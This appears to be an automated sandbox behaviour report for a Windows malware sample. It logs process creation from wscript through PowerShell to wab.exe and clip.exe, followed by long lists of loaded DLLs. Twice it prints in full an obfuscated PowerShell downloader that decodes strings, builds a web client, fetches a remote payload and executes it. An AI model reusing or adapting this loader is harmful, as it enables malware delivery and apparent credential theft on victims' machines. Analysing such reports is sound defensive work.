          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe; Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Windows\SysWOW64\clip.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe; Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: winnsi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: urlmon.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: srvcli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: netutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: schannel.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: mskeyprotect.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ntasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: dpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: gpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ncrypt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\clip.exe; Section loaded: version.dll
          Source: C:\Windows\SysWOW64\clip.exe; Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
